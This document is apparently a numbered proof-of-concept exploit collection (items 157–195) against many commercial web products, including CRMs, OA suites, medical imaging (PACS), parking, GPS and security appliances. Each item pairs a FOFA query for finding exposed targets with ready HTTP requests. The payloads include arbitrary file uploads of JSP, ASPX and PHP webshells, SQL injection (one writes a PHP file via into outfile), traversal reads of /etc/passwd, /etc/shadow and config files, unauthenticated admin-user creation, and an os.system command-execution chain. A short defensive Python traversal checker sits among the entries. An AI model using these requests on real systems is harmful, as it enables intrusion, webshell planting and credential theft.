Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. MetaCRM (美特CRM) upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

The uploaded file is then reachable at http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection (Masa CMS fingerprint)
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. INFINITT PACS (英飞达医学影像存档与通信系统) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

Then call the uploaded handler: /1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. Keytop (科拓) smart parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Step 2: request the written file: http://x.x.x.x/dizxdell.aspx

162. Hefeng (和丰) multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

The uploaded file is then reachable at http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. Haoka Jituan (号卡极团) distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. Smart Campus (慧校园/安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

The uploaded file is then reachable at http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. Zhongcheng Kexin (中成科信) ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 149

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. LVS Lean Value Management System (精益价值管理系统) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. Hongjing (宏景) EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. Hongjing (宏景) EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. Hongjing (宏景) EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. Tongtianxing (通天星) CMSV6 vehicle GPS monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera (DT-高清车牌识别摄像机) arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. Jinhe (金和) OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. Jinhe (金和) OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system (电信网关配置管理系统) rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
Paths that return the device configuration file (the file name depends on the router model):
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system (校园网自助服务系统) flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

Then fetch the stored file:
GET /imc/primepush/%2e%2e/flex/12234.txt

179. Jianwen (建文) engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

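The file-read entries 160, 167, 172, 173 and 179 above all rest on the same primitive: a `..` segment, sometimes percent-encoded, that survives into a filesystem path. The check below is an added example written for this page, not code from any of the affected products or from the original article. The base directory `/srv/app/files` and the benign sample path are assumptions for illustration; the traversal samples are copied from the requests above. It decodes until the string is stable, normalizes, and confines the result to a base directory, and it also shows why containment alone does not catch entry 167's `UploadFile/../Web.Config`, which never leaves the web root.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Request paths copied from the PoCs above (entries 160, 167, 172, 173, 179).
TRAVERSAL_SAMPLES = [
    "/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",  # 160
    "UploadFile/../Web.Config",                  # 167
    "/../../../../etc/passwd",                   # 172
    "aCSHELL/../../../../../../../etc/shadow",   # 173
    "../log4net.config",                         # 179
]

# Assumed directory the application is allowed to serve from (illustrative).
SERVE_ROOT = "/srv/app/files"


def fully_decode(raw: str, rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded), so single-
    and double-encoded '..' and '/' are all visible before any check runs."""
    cur = raw
    for _ in range(rounds):
        nxt = unquote(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur


def has_dotdot_segment(requested: str) -> bool:
    """True if any path segment of the decoded request is exactly '..'.
    Backslashes count as separators because the ASP.NET targets above
    (entries 167, 174, 179) run on Windows and accept both."""
    decoded = fully_decode(requested).replace("\\", "/")
    return any(seg == ".." for seg in decoded.split("/"))


def resolve_under_base(base: str, requested: str) -> Optional[str]:
    """Join `requested` onto `base` after decoding and normalizing, and return
    the absolute path only if it is still inside `base`; otherwise None."""
    decoded = fully_decode(requested).replace("\\", "/")
    base_norm = posixpath.normpath(base)
    # Leading slashes are dropped so an absolute-looking request cannot
    # replace the base the way a naive join would.
    joined = posixpath.normpath(posixpath.join(base_norm, decoded.lstrip("/")))
    if joined == base_norm or joined.startswith(base_norm + "/"):
        return joined
    return None


def is_traversal(requested: str) -> bool:
    """Log-review predicate: flag the request if it carries a '..' segment or
    would resolve outside SERVE_ROOT. Both tests are needed: entry 167's
    'UploadFile/../Web.Config' stays inside the web root yet still reads a
    file the download handler was never meant to serve."""
    return has_dotdot_segment(requested) or resolve_under_base(SERVE_ROOT, requested) is None


if __name__ == "__main__":
    for p in TRAVERSAL_SAMPLES:
        print(f"{is_traversal(p)!s:5}  {fully_decode(p)}")
```

Serving files by an opaque identifier looked up in a table, rather than by a client-supplied path, removes the problem entirely. Where a path must be accepted, reject `..` outright after decoding and then confine the result to the narrowest directory that should be readable, not the web root.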
180. Bangguanke (帮管客) CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. Runshen (润申信息科技) enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. Runshen (润申科技) enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. Guangzhou Tuchuang (广州图创) Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. Xunrao (迅饶科技) X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. Realor (瑞友) Tianyi application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement unit for photovoltaic power plants.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. Santi (叁体) Jiahui (佳会) video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. Lanwon (蓝网科技) clinical viewer system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short-video matrix marketing system (短视频矩阵营销系统) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system (CDGServer3): NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
Time-based blind injection against MSSQL via the id field; keep the /js/../ segment in the path, it is part of the POC.
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 foreign-trade ERP: UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
The name query parameter supplies the stored file's extension (.ashx here) and the raw request body becomes the file content, so a C# HTTP handler can be dropped directly.
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<%@ WebHandler Language="C#" Class="AverageHandler" %>
using System;
using System.Web;

public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    {
        get { return true; }
    }

    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科 (Hillstone) 云鉴 security management system: setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
1. Obtain a CSRF token for an arbitrary, unauthenticated PHPSESSID:
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

2. Send the token ({{token}}) and the same session cookie to setSystemTimeAction.php. The param value is evaluated as Python, so os.system() runs a shell command; the POC writes a marker file under the web root:
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

3. Verify that the marker was written:
GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE enterprise operations management platform: uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the servlet is exposed and the target is likely vulnerable.
The multipart filename is not sanitised: the ../ sequence places hello.jsp inside the deployed fe.war web application, where it is served as JSP.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 internet behavior management system: send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
